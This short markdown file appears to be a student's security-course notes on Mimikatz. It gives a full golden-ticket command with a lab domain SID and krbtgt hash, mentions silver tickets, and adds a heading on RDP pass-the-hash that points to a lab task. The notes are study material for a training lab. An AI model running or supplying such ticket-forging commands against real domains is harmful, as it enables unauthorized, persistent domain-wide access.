knoepdan/CyberSecRappi/specialTopics/Important tools/Mimikatz_Credentials.md

 Golden ticket: `mimikatz kerberos::golden /user:dfm /domain:testlab.local /sid:S-1-5-21-883232822-274137685-4173207997 /krbtgt:b3c87251042db43980ef7607733fda72 /ptt`  (via Cobal strike, see pdf)

 Silver ticket is similar just for a specific service.

+## Connect via RDP if we only have the hash
+see lab task "Lateral Movement/Abusing Domain Admin"